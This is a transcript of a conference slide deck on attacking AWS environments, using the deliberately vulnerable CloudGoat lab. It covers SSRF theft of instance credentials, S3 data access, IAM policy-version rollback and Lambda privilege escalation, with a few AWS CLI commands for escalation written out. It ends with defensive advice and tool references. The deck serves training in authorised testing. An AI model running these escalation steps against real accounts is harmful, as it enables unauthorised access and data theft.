Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Understanding AWS cloud attacks

Understanding AWS cloud attacks

Enterprises are increasingly running their IT and application infrastructure natively in the cloud.

Regardless of whether you are a cloud security enthusiast or a pentester, it is important that you are able to assess the security of the cloud platform and pentest these cloud-native deployments to help secure organizations. This session will help you get started and understand what are the different attacks that are possible on a target AWS environment.

You will learn how to discover vulnerabilities and what attacks are possible on AWS that leverage AWS IAM, SSRF, Lambda and S3, etc.

1e6cfe94614ed96ac769e93f2e0c63f0?s=128

Kavisha Sheth

August 01, 2021
Tweet

Transcript

  1. using CloudGoat Understanding AWS attacks using CloudGoat Kavisha sheth

  2. About me About me Kavisha Sheth • Security Analyst at

    Appsecco • Breaks web application, API and Cloud security • Member of a number of security communities including null community, InfoSecGirls, and WiCys India • Listed as one of the top security researchers of the nation, in a newsletter of NCIIPC RVDP
  3. Agenda • AWS Real World Attacks • Attacking AWS infra

    using keys obtained via SSRF • Enumerating and attacking AWS S3 storage • Privilege escalation within AWS using IAM policy rollback • Privilege escalation using lambda functions • Next steps in learning • Tools • References
  4. Why are we doing this? • Enterprises are increasingly running

    their IT and application infrastructure natively in the cloud • Multiple cloud assessments has shown mis-configurations to be a major security concern • Lot of default code and deployment practices on the Internet do not take security into account • Shared responsibility between cloud provider and you can be confusing • If you are aware of what attacks are out there, you can defend yourself better
  5. What am I covering today • Attacking AWS infra using

    keys obtained via SSRF • Enumerating and attacking AWS S3 storage • Privilege escalation within AWS using IAM policy rollback • Privilege escalation using lambda functions
  6. Target Environment • To understand the attacks in today's talk

    we will be using CloudGoat as our target environment • You can setup CloudGoat to practice these attacks by following instructions from our reference slide
  7. Attacking AWS infra using keys obtained via SSRF

  8. 1. Discovery of AWS IAM keys in client-side source code

  9. 2. Identify the user using AWS STS

  10. 3. Enumerate permissions for solus user

  11. 4. List Lamba functions Hard-coded AWS security credentials in the

    environment variables of the lambda function
  12. 5. Identify who the credentials belong to

  13. 6. Permission enumeration for IAM user "wrex" EC2 operations access

  14. 7. What EC2 instances are running?

  15. 8. Describe EC2 instance Public IP address of the EC2

    instance
  16. 9. Web application running on port 80

  17. 10. Added string value to URL parameter

  18. Web application vulnerable to SSRF

  19. None
  20. 11. Steal the IAM role credentials

  21. 12. Enumerate permissions

  22. 13.List the buckets and download any data stored on the

    s3 buckets.
  23. Approach so far !! • Found credentials with read only

    access • Application which is hosted on EC2 instance was vulnerable to SSRF • Role was attached to EC2 instance • Exploit to steal the IAM role credentials • Look for permissions • Found S3 related permission • List S3 bucket and downloaded data What was our approach?
  24. Attacker flow so far!!

  25. What's next? • Is web application hosted on EC2 instance?

    • Is role attached to EC2 instance?
  26. Post exploitation of SSRF

  27. Finding SSRF via HTML Injection inside a PDF file on

    AWS EC2 https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec 5d90
  28. AWS S3 Data breach

  29. Scenario Assumptions • Attacker has discovered a public IP with

    a HTTP reverse proxy running • Reverse proxy is misconfigured (does not check target IP) • This reverse proxy allows access to any internal IP addresses including the instance metadata endpoint
  30. 1. Crafted cURL command

  31. 2. Role credentials retrieved

  32. 3.Configure profile using stolen credentials

  33. 4. Enumerate permissions Command: python enumerate-iam.py --access-key ACCESS-ID --secret-key SECRET-KEY

    --session-token SESSION-TOKEN
  34. 5.Get access to S3 bucket data

  35. Approach https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/cloud_breach_s3/README.md

  36. Where can you find S3 buckets ? • HTTP responses

    when uploading a file • In DNS records • Google searches for website name and s3 buckets • Shodan, Certificate Transparency Logs, Censys, numerous bucket finder scripts, GrayHat Warfare bucket search
  37. Privilege escalation within AWS using IAM policy rollback

  38. Scenario Assumptions • Credentials already found by attacker (through JS

    source, Github, server-side code disclosure etc.)
  39. Credentials Found

  40. 1. Entity/verify who the security credentials belong to

  41. 2. Review and enumerate policy versions

  42. 3. Enumerate Policy versions

  43. 4. Policy with admin privileges – version 3

  44. 5. Make V3 version as the default policy version Command

    to make V5 default policy version aws iam set-default-policy-version \ --policy-arn "arn:aws:iam::ACCOUNT-ID:policy/cg-raynor-policy" \ --version-id v3 --profile <PROFILE-NAME> Let's create a new IAM user!
  45. Tool to detect this vulnerability automatically https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_e scalate.py

  46. Privilege escalation using lambda functions

  47. Scenario Assumptions • Credentials already found by attacker (through JS

    source, Github, server-side code disclosure etc.)
  48. 1.List users and policies

  49. 2. List Roles

  50. 3.Verifying Access control

  51. 4.Try to assume lambda manager role

  52. 5. Attach the administrator policy to the IAM user "Chris"

  53. 6. Leverage the lambdaManager role to perform a privilege escalation

    using a Lambda function • Create lambda function: • aws lambda create-function --function-name admin_function --runtime python3.6 --role <cg-debug-role arn> --handler code.lambda_handler --zip-file fileb://code.zip --profile lambdaManager • Invoke lambda function: aws lambda invoke --function-name admin_function out.txt --profile lambdaManager
  54. 7. Chris got full admin access

  55. Approach

  56. Some AWS Vulnerability detection tools • Scout Suite • Prowler

    • Bucket finder • Enumerate IAM • iam_user_enum
  57. Things to note • Reconnaissance and OSINT are the key

    to discover the security issues in cloud services and applications • To prevent the risk associated with a successful SSRF on AWS, administrators can upgrade EC2 instance metadata endpoints to IMDSv2 which can protect EC2 instances against vanilla SSRF attempts • Make sure that EC2 instances are configured properly • The most common themes are mis-configuration of services, insecure programming and permissions that should not have been given • Post exploitation has no limits with the cloud. You can attack additional services, disrupt logging, make code changes to attack users. • There are a ton of tools that security folks have written on GitHub and a lot of work is being done in the attack and exploitation areas
  58. References • https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest- tools/iam_user_enum • https://github.com/appsecco/attacking-cloudgoat2 • https://blog.appsecco.com/server-side-request-forgery-ssrf-and-aws-ec2-instances-after -instance-meta-data-service-version-38fc1ba1a28a •

    https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilit ies-7630fa57c7ed • https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios • https://github.com/toniblyx/prowler • https://github.com/nccgroup/ScoutSuite • https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
  59. Kavisha Sheth Security Analyst https://linkedin.com/in/ kavisha-sheth/ https://twitter.com/sheth_ kavisha